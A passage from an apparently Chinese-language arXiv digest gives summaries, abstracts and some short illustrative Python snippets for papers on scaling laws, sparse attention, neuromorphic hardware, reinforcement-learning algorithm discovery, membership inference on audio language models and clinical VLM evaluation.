[AI-17] The Unreasonable Effectiveness of Scaling Laws in AI
【速读】:该论文试图解决经典AI缩放定律(scaling laws)在实践中表现出的两个看似矛盾的现象:其一,这些定律虽为经验性观察,却能在不同模型家族和训练相关场景中反复适用;其二,尽管预测边际收益递减,实际进展仍因效率提升而持续,例如每token成本下降。解决方案的关键在于认识到,缩放定律的有效性源于对实现细节的抽象——将计算量(compute)视为逻辑计算(logical compute),即与具体实现无关的模型侧工作量,而实际扩展压力则取决于资源转化为该逻辑计算的效率。这种抽象解释了定律跨场景的普适性,并揭示出效率提升成为维持Scaling可持续性的核心驱动力,从而将问题从单纯的损失曲线下降转向系统级效率改进的“效率博弈”。
链接: https://arxiv.org/abs/2603.28507
作者: Chien-Ping Lu
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 8 pages, 1 figure
Abstract:Classical AI scaling laws, especially for pre-training, describe how training loss decreases with compute in a power-law form. Their effectiveness has a basic and very practical sense: they make progress predictable, albeit at a declining rate. Yet their effectiveness is also unreasonable in two further senses. First, these laws are largely empirical and observational, but they appear repeatedly across model families and increasingly across training-adjacent regimes. Second, despite the diminishing returns they predict, progress in practice has often continued through rapidly improving efficiency, visible for example in falling cost per token. This paper argues that both features arise from the same source: scaling laws are unusually effective because they abstract away from many realization details. The compute variable is best understood as logical compute, an implementation-agnostic notion of model-side work, while the practical burden of scaling depends on how efficiently real resources are converted into that compute. This abstraction helps explain both why the laws travel so well across settings and why they give rise to a persistent efficiency game in hardware, algorithms, and systems. Once efficiency is made explicit, the main practical question becomes how many efficiency doublings are required to keep scaling productive despite diminishing returns. Under that view, diminishing returns are not only a geometric flattening of the loss curve, but also rising pressure for cost reduction, system-level innovation, and the breakthroughs needed to sustain Moore-like efficiency doublings.
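补充示例:摘要中“损失随计算量按幂律下降、需靠效率翻倍维持进展”的论证可以用几行代码量化(a、alpha 为演示用假设值,并非文中拟合参数)。

```python
import math

def loss(compute, a=1.0, alpha=0.05):
    """幂律缩放定律 L(C) = a * C^(-alpha)(a、alpha 为演示假设)。"""
    return a * compute ** (-alpha)

def compute_for_loss(target, a=1.0, alpha=0.05):
    """反解:达到目标损失所需的(逻辑)计算量。"""
    return (a / target) ** (1.0 / alpha)

def doublings_needed(loss_from, loss_to, alpha=0.05):
    """在实际预算不变的前提下,损失从 loss_from 降到 loss_to
    需要多少次“效率翻倍”来抵消逻辑计算量的增长。"""
    ratio = compute_for_loss(loss_to, alpha=alpha) / compute_for_loss(loss_from, alpha=alpha)
    return math.log2(ratio)
```

同样 10% 的相对损失下降,无论起点在哪,所需计算量都乘以同一常数因子 (1/0.9)^(1/alpha),即固定次数的效率翻倍,这正是损失曲线“几何变平”转化为持续效率压力的机制。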
[AI-18] Next-Token Prediction and Regret Minimization
【速读】:该论文旨在解决在对抗性在线决策环境中,如何利用基于下一个token预测(next-token prediction)的模型来实现低后悔(low-regret)决策的问题。核心问题是:当训练一个预测模型以学习对手动作序列分布 D 时,何时该模型诱导的近似最优响应策略能够保证低对抗后悔?其关键解决方案在于区分上下文窗口的长度:对于无界上下文窗口(即模型可依赖全部历史动作),证明任意分布 D 均存在一个与其总变差距离指数级接近的低后悔分布,从而可在几乎不损失原始模型准确性的前提下实现次线性后悔;而对于有界上下文窗口(如现代Transformer架构中仅依赖最近 w 步动作的情况),则存在某些分布 D 与所有低后悔分布之间距离为常数阶(Θ(1)),说明此类结构本身无法保证低后悔,需额外处理。进一步地,作者提出可通过标准Transformer层实现无界上下文的鲁棒化重构,并提供实证证据表明Transformer可高效学习这些新构造的低后悔分布。
链接: https://arxiv.org/abs/2603.28499
作者: Mehryar Mohri,Clayton Sanford,Jon Schneider,Kiran Vodrahalli,Yifan Wu
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT)
备注:
Abstract:We consider the question of how to employ next-token prediction algorithms in adversarial online decision-making environments. Specifically, if we train a next-token prediction model on a distribution D over sequences of opponent actions, when is it the case that the induced online decision-making algorithm (by approximately best responding to the model’s predictions) has low adversarial regret (i.e., when is D a low-regret distribution)? For unbounded context windows (where the prediction made by the model can depend on all the actions taken by the adversary thus far), we show that although not every distribution D is a low-regret distribution, every distribution D is exponentially close (in TV distance) to one low-regret distribution, and hence sublinear regret can always be achieved at negligible cost to the accuracy of the original next-token prediction model. In contrast to this, for bounded context windows (where the prediction made by the model can depend only on the past w actions taken by the adversary, as may be the case in modern transformer architectures), we show that there are some distributions D of opponent play that are Θ(1)-far from any low-regret distribution D’ (even when w = Ω(T) and such distributions exist). Finally, we complement these results by showing that the unbounded context robustification procedure can be implemented by layers of a standard transformer architecture, and provide empirical evidence that transformer models can be efficiently trained to represent these new low-regret distributions.
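背景参照(非论文方法):文中“低后悔”以对抗后悔为标准,其经典基线是乘性权重(Hedge)算法,在 K 个动作、T 轮对抗损失下保证 O(√(T log K)) 后悔。最小实现如下,便于对照“后悔”这一指标的含义。

```python
import math

def hedge(loss_rows, eta):
    """乘性权重(Hedge):K 个动作上的在线决策。
    返回(累计期望损失, 相对最优固定动作的后悔)。"""
    K = len(loss_rows[0])
    w = [1.0] * K                 # 各动作权重
    total = 0.0
    cum = [0.0] * K               # 各固定动作的累计损失
    for losses in loss_rows:
        s = sum(w)
        p = [wi / s for wi in w]  # 当前混合策略
        total += sum(pi * li for pi, li in zip(p, losses))
        for i, li in enumerate(losses):
            cum[i] += li
            w[i] *= math.exp(-eta * li)
    return total, total - min(cum)
```

取 eta = sqrt(8 ln K / T) 时后悔不超过 sqrt((T/2) ln K),即随 T 次线性增长。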
[AI-19] HISA: Efficient Hierarchical Indexing for Fine-Grained Sparse Attention
【速读】:该论文旨在解决稀疏注意力机制中因索引器(indexer)对整个上下文序列进行逐token扫描而导致的计算瓶颈问题,特别是在长序列场景下,传统方法如DeepSeek Sparse Attention (DSA) 的 indexer 会产生 O(L²) 的每层复杂度,严重限制了扩展性。解决方案的关键在于提出一种名为 HISA(Hierarchical Indexed Sparse Attention)的层级化索引结构:它将原本单一层次的 token 级别搜索转化为两阶段过程——首先通过块级粗筛(block-level coarse filter)对池化后的块代表进行评分以剔除无关区域,再在候选块内使用原始 indexer 进行细粒度精筛。该设计无需额外训练即可保持与原DSA一致的 token-level top-k 稀疏模式,且在 kernel-level 基准测试中实现了高达 4× 的加速比(128K 上下文长度),同时在 Needle-in-a-Haystack 和 LongBench 等任务上验证了其精度无损(mean IoU > 99%)。
链接: https://arxiv.org/abs/2603.28458
作者: Yufei Xu,Fanxu Meng,Fan Jiang,Yuxuan Wang,Ruijie Zhou,Jiexi Wu,Zhixin Pan,Zhaohui Wang,Xiaojuan Tang,Wenjie Pei,Tongxuan Liu,Di yin,Xing Sun,Muhan Zhang
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Token-level sparse attention mechanisms, exemplified by DeepSeek Sparse Attention (DSA), achieve fine-grained key selection by scoring every historical token for each query using a lightweight indexer, and then computing attention only over the selected subset. While the downstream sparse attention scales efficiently, the indexer still scans the entire prefix for every query, introducing an O( L^2 ) per-layer bottleneck that becomes prohibitive as context length grows. We propose HISA (Hierarchical Indexed Sparse Attention), a drop-in replacement for the indexer that transforms the search process from a flat token scan into a two-stage hierarchical procedure. First, a block-level coarse filter scores pooled block representatives to prune irrelevant regions. Then, a token-level refinement applies the original indexer only within the remaining candidate blocks. HISA preserves the exact token-level top-k sparsity pattern required by the downstream Sparse MLA operator and requires no additional training. On kernel-level benchmarks, HISA achieves a 2 \times speedup at 32K context length and 4 \times at 128K. On Needle-in-a-Haystack and LongBench, we directly replace the indexer in DeepSeek-V3.2 with HISA, without any fine-tuning. HISA closely matches the original DSA in quality while significantly outperforming block-sparse baselines. Moreover, the token selection sets produced by HISA and the original DSA exhibit a mean IoU greater than 99%, indicating that the efficiency gains come with virtually no impact on selection fidelity.
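补充示例:两阶段层级索引的流程可以用 numpy 直观示意(以均值池化作块代表,块大小、保留块数均为演示假设;真实实现为 GPU 融合 kernel)。

```python
import numpy as np

def flat_topk(q, keys, k):
    """逐 token 扫描的平坦 top-k(对应原 DSA indexer 的 O(L) 每查询扫描)。"""
    scores = keys @ q
    return set(np.argsort(-scores)[:k].tolist())

def hisa_topk(q, keys, k, block_size, n_blocks_keep):
    """两阶段层级 top-k:块级粗筛 + 块内 token 级精筛。"""
    L = len(keys)
    n_blocks = (L + block_size - 1) // block_size
    # 第一阶段:对均值池化的块代表打分,剪掉无关区域
    block_scores = np.array([
        keys[b * block_size:(b + 1) * block_size].mean(axis=0) @ q
        for b in range(n_blocks)
    ])
    kept = np.argsort(-block_scores)[:n_blocks_keep]
    # 第二阶段:仅在幸存块内做 token 级精筛
    cand = np.array([t for b in kept
                     for t in range(b * block_size, min((b + 1) * block_size, L))])
    order = np.argsort(-(keys[cand] @ q))[:k]
    return set(cand[order].tolist())
```

当高分 token 集中于少数块时,层级筛选与平坦扫描给出相同的 top-k 集合,呼应文中 HISA 与原 DSA 选择集平均 IoU 大于 99% 的观察。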
[AI-20] AceleradorSNN: A Neuromorphic Cognitive System Integrating Spiking Neural Networks and DynamicImage Signal Processing on FPGA
【速读】:该论文旨在解决自动驾驶系统(如高级驾驶辅助系统ADAS、无人机UAV及工业4.0机器人)中对高速、低延迟和高能效目标检测的需求,这一需求已暴露出传统卷积神经网络(CNN)的局限性。其解决方案的关键在于提出AceleradorSNN架构,该架构融合了基于脉冲神经网络(Spiking Neural Networks, SNNs)的类脑处理单元(Neuromorphic Processing Unit, NPU),用于处理动态视觉传感器(Dynamic Vision Sensors, DVS)产生的异步事件数据,并结合一个可动态重构的认知图像信号处理器(Cognitive Image Signal Processor, ISP)来处理RGB摄像头数据,从而实现高效、实时的目标检测与感知。
链接: https://arxiv.org/abs/2603.28429
作者: Daniel Gutierrez,Ruben Martinez,Leyre Arnedo,Antonio Cuesta,Soukaina El Hamry
机构: 未知
类目: Hardware Architecture (cs.AR); Artificial Intelligence (cs.AI)
备注:
Abstract:The demand for high-speed, low-latency, and energy-efficient object detection in autonomous systems – such as advanced driver-assistance systems (ADAS), unmanned aerial vehicles (UAVs), and Industry 4.0 robotics – has exposed the limitations of traditional Convolutional Neural Networks (CNNs). To address these challenges, we have developed AceleradorSNN, a third-generation artificial intelligence cognitive system. This architecture integrates a Neuromorphic Processing Unit (NPU) based on Spiking Neural Networks (SNNs) to process asynchronous data from Dynamic Vision Sensors (DVS), alongside a dynamically reconfigurable Cognitive Image Signal Processor (ISP) for RGB cameras. This paper details the hardware-oriented design of both IP cores, the evaluation of surrogate-gradienttrained SNN backbones, and the real-time streaming ISP architecture implemented on Field-Programmable Gate Arrays (FPGA).
[AI-21] Spectral Higher-Order Neural Networks
【速读】:该论文旨在解决传统神经网络在处理高阶交互(higher-order interactions)时存在的稳定性差与参数规模难以控制的问题,尤其是在非超图结构输入场景下,现有方法(如增强型图神经网络)优势受限。其解决方案的关键在于提出谱域重构策略——通过将模型重新表述为基于谱属性(spectral attributes)的形式,从而有效缓解加权高阶前向传播带来的不稳定性与参数扩展难题,实现了通用前馈网络结构中高阶耦合机制的稳定集成。
链接: https://arxiv.org/abs/2603.28420
作者: Gianluca Peri,Timoteo Carletti,Duccio Fanelli,Diego Febbe
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Neural networks are fundamental tools of modern machine learning. The standard paradigm assumes binary interactions (across feedforward linear passes) between inter-tangled units, organized in sequential layers. Generalized architectures have been also designed that move beyond pairwise interactions, so as to account for higher-order couplings among computing neurons. Higher-order networks are however usually deployed as augmented graph neural networks (GNNs), and, as such, prove solely advantageous in contexts where the input exhibits an explicit hypergraph structure. Here, we present Spectral Higher-Order Neural Networks (SHONNs), a new algorithmic strategy to incorporate higher-order interactions in general-purpose, feedforward, network structures. SHONNs leverages a reformulation of the model in terms of spectral attributes. This allows to mitigate the common stability and parameter scaling problems that come along weighted, higher-order, forward propagations.
[AI-22] KGroups: A Versatile Univariate Max-Relevance Min-Redundancy Feature Selection Algorithm for High-dimensional Biological Data
【速读】:该论文旨在解决特征选择(Feature Selection, FS)中一个关键问题:当前大多数单变量滤波式特征选择(Univariate Filter Feature Selection, FFS)方法的预测性能提升,究竟在多大程度上依赖于所采用的选择算法本身,而非仅由相关性(relevance)或冗余性(redundancy)评估机制决定。传统FFS方法主要分为两类:基于相关性最大化(Max-Rel,又称KBest)和同时最大化相关性并最小化冗余性(mRMR)。尽管mRMR表现优异但计算复杂度高,而KBest虽快却受限于单一排序策略。本文提出一种新的单变量FFS算法KGroups,其核心创新在于利用聚类(clustering)替代传统的排序或增量搜索策略进行特征选择,从而在保持与多变量mRMR相当预测性能的同时,显著提升效率(最高达821倍),且具备可调参特性,为后续超参数优化留出空间。
链接: https://arxiv.org/abs/2603.28417
作者: Malick Ebiele,Malika Bendechache,Rob Brennan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:This paper proposes a new univariate filter feature selection (FFS) algorithm called KGroups. The majority of work in the literature focuses on investigating the relevance or redundancy estimations of feature selection (FS) methods. This has shown promising results and a real improvement of FFS methods’ predictive performance. However, limited efforts have been made to investigate alternative FFS algorithms. This raises the following question: how much of the FFS methods’ predictive performance depends on the selection algorithm rather than the relevance or the redundancy estimations? The majority of FFS methods fall into two categories: relevance maximisation (Max-Rel, also known as KBest) or simultaneous relevance maximisation and redundancy minimisation (mRMR). KBest is a univariate FFS algorithm that employs sorting (descending) for selection. mRMR is a multivariate FFS algorithm that employs an incremental search algorithm for selection. In this paper, we propose a new univariate mRMR called KGroups that employs clustering for selection. Extensive experiments on 14 high-dimensional biological benchmark datasets showed that KGroups achieves similar predictive performance compared to multivariate mRMR while being up to 821 times faster. KGroups is parameterisable, which leaves room for further predictive performance improvement through hyperparameter finetuning, unlike mRMR and KBest. KGroups outperforms KBest.
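假设性草图(非论文算法):KGroups 的具体聚类选择流程未在摘要中给出。下面按“以相关性对特征分组、每组保留与标签最相关的代表”这一思路给出示意,冗余阈值 0.8 为演示假设。

```python
import numpy as np

def kgroups_like_select(X, y, k, redundancy_thresh=0.8):
    """假设性的基于分组的单变量特征选择草图:
    按相关性降序取组代表,并丢弃与代表高度相关(冗余)的其余特征。"""
    n_feat = X.shape[1]
    relevance = np.array([abs(np.corrcoef(X[:, j], y)[0, 1]) for j in range(n_feat)])
    corr = np.abs(np.corrcoef(X, rowvar=False))   # 特征间相似度
    remaining = list(np.argsort(-relevance))      # 相关性降序
    selected = []
    while remaining and len(selected) < k:
        j = remaining.pop(0)                      # 当前组的代表
        selected.append(j)
        # 该组其余成员(与代表高度相关者)整体剔除
        remaining = [r for r in remaining if corr[j, r] < redundancy_thresh]
    return selected
```

这一思路同时体现“相关性最大化”与“冗余最小化”,且每个特征只与少量组代表比较,呼应其相对多变量 mRMR 的速度优势。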
[AI-23] Evolutionary Discovery of Reinforcement Learning Algorithms via Large Language Models GECCO2026
【速读】:该论文旨在解决传统强化学习(Reinforcement Learning, RL)算法设计中依赖人工手写更新规则、难以发现新颖有效机制的问题。其核心解决方案是提出一种基于进化的框架,通过直接在可执行的更新规则空间中搜索完整的训练过程,实现RL算法的自动化发现。关键创新在于利用大语言模型作为生成变异算子(generative variation operators),扩展了REvolve系统从奖励函数发现到算法发现的能力,并通过排除经典结构(如actor-critic架构、时序差分损失和价值自举)来促进非标准学习规则的涌现;此外,引入后进化微调阶段,由大语言模型为每个演化出的更新规则推荐可行的超参数范围,从而提升算法在多个Gymnasium基准上的端到端性能,达到与SAC、PPO、DQN和A2C等主流算法相当的水平。
链接: https://arxiv.org/abs/2603.28416
作者: Alkis Sygkounas,Amy Loutfi,Andreas Persson
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: accepted at GECCO 2026
Abstract:Reinforcement learning algorithms are defined by their learning update rules, which are typically hand-designed and fixed. We present an evolutionary framework for discovering reinforcement learning algorithms by searching directly over executable update rules that implement complete training procedures. The approach builds on REvolve, an evolutionary system that uses large language models as generative variation operators, and extends it from reward-function discovery to algorithm discovery. To promote the emergence of nonstandard learning rules, the search excludes canonical mechanisms such as actor–critic structures, temporal-difference losses, and value bootstrapping. Because reinforcement learning algorithms are highly sensitive to internal scalar parameters, we introduce a post-evolution refinement stage in which a large language model proposes feasible hyperparameter ranges for each evolved update rule. Evaluated end-to-end by full training runs on multiple Gymnasium benchmarks, the discovered algorithms achieve competitive performance relative to established baselines, including SAC, PPO, DQN, and A2C.
[AI-24] From Simulation to Deep Learning: Survey on Network Performance Modeling Approaches
【速读】:该论文旨在解决网络性能建模方法多样化且缺乏系统性分类与评估标准的问题,特别是在有线网络领域中,传统基于离散事件仿真(Discrete Event Simulation, DES)和数学理论(如排队论和网络演算)的方法正逐步被并行化DES、机器学习模型及混合方法所补充甚至替代。其解决方案的关键在于提出一个全面的综述框架,梳理近几十年来主流的网络性能建模技术,并构建一套清晰的分类体系(taxonomy),以总结当前研究进展及其随技术演进和学术关注点变化的趋势;同时,论文还深入探讨了不同模型类型的评估需求与目标差异,为后续方法比较与选择提供依据。
链接: https://arxiv.org/abs/2603.28394
作者: Carlos Güemes-Palau,Miquel Ferriol-Galmés,Jordi Paillisse-Vilanova,Pere Barlet-Ros,Albert Cabellos-Aparicio
机构: 未知
类目: Networking and Internet Architecture (cs.NI); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Preprint, final accepted version published on Computer Networks (DOI: https://doi.org/10.1016/j.comnet.2026.112253 ). 87 pages, 3 figures
Abstract:Network performance modeling is a field that predates early computer networks and the beginning of the Internet. It aims to predict the traffic performance of packet flows in a given network. Its applications range from network planning and troubleshooting to feeding information to network controllers for configuration optimization. Traditional network performance modeling has relied heavily on Discrete Event Simulation (DES) and analytical methods grounded in mathematical theories such as Queuing Theory and Network Calculus. However, as of late, we have observed a paradigm shift, with attempts to obtain efficient Parallel DES, the surge of Machine Learning models, and their integration with other methodologies in hybrid approaches. This has resulted in a great variety of modeling approaches, each with its strengths and often tailored to specific scenarios or requirements. In this paper, we comprehensively survey the relevant network performance modeling approaches for wired networks over the last decades. With this understanding, we also define a taxonomy of approaches, summarizing our understanding of the state-of-the-art and how both technology and the concerns of the research community evolve over time. Finally, we also consider how these models are evaluated, how their different nature results in different evaluation requirements and goals, and how this may complicate their comparison.
[AI-25] he Scaffold Effect: How Prompt Framing Drives Apparent Multimodal Gains in Clinical VLM Evaluation
【速读】:该论文旨在解决临床人工智能(AI)系统中性能提升是否真正源于对多模态数据的深度理解,而非仅依赖于表面特征或提示工程的问题。其核心挑战在于如何区分模型的实际多模态推理能力与因任务提示设计导致的虚假关联,尤其是在神经影像学这类缺乏个体诊断信号的数据集上。解决方案的关键在于通过严格的对比分析和专家评估揭示“支架效应”(scaffold effect)——即仅在任务提示中提及MRI可用性即可解释多达70–80%的性能变化,而无需实际使用影像数据;同时发现偏好对齐虽能消除MRI引用行为,却使模型表现退化至随机水平,表明当前表面指标无法反映真实推理能力,从而强调了在临床部署中需建立更可靠的多模态推理验证机制。
链接: https://arxiv.org/abs/2603.28387
作者: Doan Nam Long Vu,Simone Balloccu
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Trustworthy clinical AI requires that performance gains reflect genuine evidence integration rather than surface-level artifacts. We evaluate 12 open-weight vision-language models (VLMs) on binary classification across two clinical neuroimaging cohorts, \textscFOR2107 (affective disorders) and \textscOASIS-3 (cognitive decline). Both datasets come with structural MRI data that carries no reliable individual-level diagnostic signal. Under these conditions, smaller VLMs exhibit gains of up to 58% F1 upon introduction of neuroimaging context, with distilled models becoming competitive with counterparts an order of magnitude larger. A contrastive confidence analysis reveals that merely \emphmentioning MRI availability in the task prompt accounts for 70-80% of this shift, independent of whether imaging data is present, a domain-specific instance of modality collapse we term the \emphscaffold effect. Expert evaluation reveals fabrication of neuroimaging-grounded justifications across all conditions, and preference alignment, while eliminating MRI-referencing behavior, collapses both conditions toward random baseline. Our findings demonstrate that surface evaluations are inadequate indicators of multimodal reasoning, with direct implications for the deployment of VLMs in clinical settings.
[AI-26] COvolve: Adversarial Co-Evolution of Large-Language-Model-Generated Policies and Environments via Two-Player Zero-Sum Game GECCO2026
【速读】:该论文旨在解决持续智能体(continually improving agents)在静态或手动构建的训练环境中难以实现持续学习与分布外泛化的问题。解决方案的关键在于提出一种名为COvolve的协同进化框架,该框架利用大语言模型(LLM)同时生成可执行Python代码形式的环境和策略,并将环境与策略设计者之间的交互建模为两人零和博弈,从而通过对抗性协同进化自动诱导出由简至繁的自动化课程。为保障鲁棒性和防止遗忘,进一步计算该零和博弈的混合策略纳什均衡(MSNE),由此得到的元策略(meta-policy)确保智能体在学习新环境的同时不遗忘旧环境的解法,实现了无需预定义任务分布或人工干预的开放式(open-ended)学习。
链接: https://arxiv.org/abs/2603.28386
作者: Alkis Sygkounas,Rishi Hazra,Andreas Persson,Pedro Zuidberg Dos Martires,Amy Loutfi
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Accepted at GECCO 2026
Abstract:A central challenge in building continually improving agents is that training environments are typically static or manually constructed. This restricts continual learning and generalization beyond the training distribution. We address this with COvolve, a co-evolutionary framework that leverages large language models (LLMs) to generate both environments and agent policies, expressed as executable Python code. We model the interaction between environment and policy designers as a two-player zero-sum game, ensuring adversarial co-evolution in which environments expose policy weaknesses and policies adapt in response. This process induces an automated curriculum in which environments and policies co-evolve toward increasing complexity. To guarantee robustness and prevent forgetting as the curriculum progresses, we compute the mixed-strategy Nash equilibrium (MSNE) of the zero-sum game, thereby yielding a meta-policy. This MSNE meta-policy ensures that the agent does not forget to solve previously seen environments while learning to solve previously unseen ones. Experiments in urban driving, symbolic maze-solving, and geometric navigation showcase that COvolve produces progressively more complex environments. Our results demonstrate the potential of LLM-driven co-evolution to achieve open-ended learning without predefined task distributions or manual intervention.
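补充示例:COvolve 的元策略需要求解零和矩阵博弈的 MSNE,论文未说明求解器。零和博弈下虚拟对弈(fictitious play)的经验频率收敛到均衡(Robinson 定理),可作最小参照实现。

```python
import numpy as np

def fictitious_play(A, iters=20000):
    """虚拟对弈近似零和矩阵博弈的混合策略纳什均衡(MSNE)。
    行玩家最大化、列玩家最小化;返回双方的经验频率。"""
    m, n = A.shape
    row_counts = np.zeros(m)
    col_counts = np.zeros(n)
    row_counts[0] = col_counts[0] = 1.0
    for _ in range(iters):
        # 双方各自对对手的经验混合策略做最优响应
        br_row = int(np.argmax(A @ (col_counts / col_counts.sum())))
        br_col = int(np.argmin((row_counts / row_counts.sum()) @ A))
        row_counts[br_row] += 1
        col_counts[br_col] += 1
    return row_counts / row_counts.sum(), col_counts / col_counts.sum()
```

在 matching pennies 这类无纯策略均衡的博弈上,双方频率收敛到 (0.5, 0.5),博弈值趋近 0。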
[AI-27] Critic-Free Deep Reinforcement Learning for Maritime Coverage Path Planning on Irregular Hexagonal Grids
【速读】:该论文旨在解决海上监视任务中复杂不规则海域的高效覆盖路径规划问题,传统方法在处理海岸线、岛屿和排除区等几何复杂性时存在分解困难或计算成本过高的缺陷。其解决方案的关键在于提出一种基于深度强化学习(Deep Reinforcement Learning, DRL)的框架,将覆盖路径规划建模为神经组合优化任务,采用Transformer结构的指针策略网络(pointer policy)自回归生成覆盖路径,并引入无价值函数估计的组相对策略优化(Group-Relative Policy Optimization, GRPO)机制,通过实例内轨迹比较来估计优势值,从而提升长程路径规划中的策略稳定性。实验表明,该方法在未见过的合成海事环境中实现了99.0%的哈密顿成功率,显著优于现有启发式方法(46.0%),且路径长度更短、转向次数更少,同时推理时间控制在50 ms/实例,具备实时机载(onboard)部署可行性。
链接: https://arxiv.org/abs/2603.28385
作者: Carlos S. Sepúlveda,Gonzalo A. Ruz
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Neural and Evolutionary Computing (cs.NE); Robotics (cs.RO)
备注:
Abstract:Maritime surveillance missions, such as search and rescue and environmental monitoring, rely on the efficient allocation of sensing assets over vast and geometrically complex areas. Traditional Coverage Path Planning (CPP) approaches depend on decomposition techniques that struggle with irregular coastlines, islands, and exclusion zones, or require computationally expensive re-planning for every instance. We propose a Deep Reinforcement Learning (DRL) framework to solve CPP on hexagonal grid representations of irregular maritime areas. Unlike conventional methods, we formulate the problem as a neural combinatorial optimization task where a Transformer-based pointer policy autoregressively constructs coverage tours. To overcome the instability of value estimation in long-horizon routing problems, we implement a critic-free Group-Relative Policy Optimization (GRPO) scheme. This method estimates advantages through within-instance comparisons of sampled trajectories rather than relying on a value function. Experiments on 1,000 unseen synthetic maritime environments demonstrate that a trained policy achieves a 99.0% Hamiltonian success rate, more than double the best heuristic (46.0%), while producing paths 7% shorter and with 24% fewer heading changes than the closest baseline. All three inference modes (greedy, stochastic sampling, and sampling with 2-opt refinement) operate under 50~ms per instance on a laptop GPU, confirming feasibility for real-time on-board deployment.
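补充示例:文中“无价值函数、以实例内轨迹比较估计优势值”的 GRPO 核心一步即组内标准化(轨迹采样与策略更新环节从略)。

```python
import numpy as np

def group_relative_advantages(rewards, eps=1e-8):
    """GRPO 的组相对优势:同一实例采样的一组轨迹,
    以组内均值/标准差归一化各自回报,无需训练价值函数(critic)。"""
    r = np.asarray(rewards, dtype=float)
    return (r - r.mean()) / (r.std() + eps)
```

优势值的正负直接由“好于/差于组内平均”决定,这正是其被称为 critic-free 的原因。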
[AI-28] Membership Inference Attacks against Large Audio Language Models INTERSPEECH2026
【速读】:该论文旨在解决大型音频语言模型(Large Audio Language Models, LALMs)在成员推理攻击(Membership Inference Attack, MIA)评估中因音频数据固有非语义信息导致的虚假性能表现问题。传统MIA评估易受训练集与测试集间分布偏移(distribution shift)干扰,从而产生误导性结论。其解决方案的关键在于提出一种多模态盲基线(multi-modal blind baseline),该基线基于文本、频谱和韵律特征,在不依赖模型推理的情况下即可识别出常见语音数据集中近乎完美的训练-测试可分性(AUC≈1.0),并揭示标准MIA得分与这些声学伪影(acoustic artifacts)存在高度相关性(相关系数>0.7)。通过此基线,研究进一步筛选出分布匹配的数据集以消除分布偏移混杂因素,并在此基础上开展多种MIA方法的基准测试及模态解耦实验,最终发现LALM的记忆效应具有跨模态特性,仅源于说话人声纹与其文本内容的绑定关系,而非单一模态内部的信息存储。这一发现为超越虚假相关性的LALM审计提供了原则性标准。
链接: https://arxiv.org/abs/2603.28378
作者: Jia-Kai Dong,Yu-Xiang Lin,Hung-Yi Lee
机构: 未知
类目: ound (cs.SD); Artificial Intelligence (cs.AI)
备注: submitted to Interspeech 2026
Abstract:We present the first systematic Membership Inference Attack (MIA) evaluation of Large Audio Language Models (LALMs). As audio encodes non-semantic information, it induces severe train and test distribution shifts and can lead to spurious MIA performance. Using a multi-modal blind baseline based on textual, spectral, and prosodic features, we demonstrate that common speech datasets exhibit near-perfect train/test separability (AUC approximately 1.0) even without model inference, and the standard MIA scores strongly correlate with these blind acoustic artifacts (correlation greater than 0.7). Using this blind baseline, we identify that distribution-matched datasets enable reliable MIA evaluation without distribution shift confounds. We benchmark multiple MIA methods and conduct modality disentanglement experiments on these datasets. The results reveal that LALM memorization is cross-modal, arising only from binding a speaker’s vocal identity with its text. These findings establish a principled standard for auditing LALMs beyond spurious correlations.
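补充示例:盲基线衡量“训练/测试可分性”所用的 AUC 可直接从分数计算(Mann–Whitney 形式),与具体模型或特征无关。

```python
def auc_from_scores(member_scores, nonmember_scores):
    """Mann–Whitney AUC:随机抽取的成员分数高于非成员分数的概率(平分记 0.5)。"""
    wins = sum((m > n) + 0.5 * (m == n)
               for m in member_scores for n in nonmember_scores)
    return wins / (len(member_scores) * len(nonmember_scores))
```

完全可分时 AUC=1.0,即文中“近乎完美的训练/测试可分性(AUC≈1.0)”的含义;0.5 则表示分数不携带任何成员信息。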
[AI-29] Coherent Without Grounding Grounded Without Success: Observability and Epistemic Failure
【速读】:该论文试图解决的问题是:当前大型语言模型(Large Language Models, LLMs)在行为表现与解释能力之间存在脱节,传统上将解释一致性视为理解的标志这一假设在LLMs中不再成立。作者指出,在低可观测性领域,LLMs可能成功执行任务却错误识别其机制;而在高可观测性领域,它们虽能生成符合因果结构的解释却无法转化为有效干预。解决方案的关键在于提出“认知三角模型”(Epistemic Triangle),强调必须同时考察解释的连贯性(coherence)、知识的具身化(grounding)以及解释与行为之间的正当基础关系(basing relation),从而建立一个三元评估框架,以更准确地判断人工智能代理是否具备真正的认知理解。
链接: https://arxiv.org/abs/2603.28371
作者: Camilo Chacón Sartori
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注:
Abstract:When an agent can articulate why something works, we typically take this as evidence of genuine understanding. This presupposes that effective action and correct explanation covary, and that coherent explanation reliably signals both. I argue that this assumption fails for contemporary Large Language Models (LLMs). I introduce what I call the Bidirectional Coherence Paradox: competence and grounding not only dissociate but invert across epistemic conditions. In low-observability domains, LLMs often act successfully while misidentifying the mechanisms that produce their success. In high-observability domains, they frequently generate explanations that accurately track observable causal structure yet fail to translate those diagnoses into effective intervention. In both cases, explanatory coherence remains intact, obscuring the underlying dissociation. Drawing on experiments in compiler optimization and hyperparameter tuning, I develop the Epistemic Triangle, a model of how priors, signals, and domain knowledge interact under varying observability. The results suggest that neither behavioral success nor explanatory accuracy alone suffices for attributing understanding. I argue that evaluating artificial epistemic agents requires a tripartite framework – coherence, grounding, and a proper basing relation linking explanation to action. The systematic separation of knowing-that and knowing-how in LLMs thus challenges assumptions inherited from both epistemology and current AI evaluation practice.
[AI-30] CoE: Collaborative Entropy for Uncertainty Quantification in Agentic Multi-LLM Systems ICLR
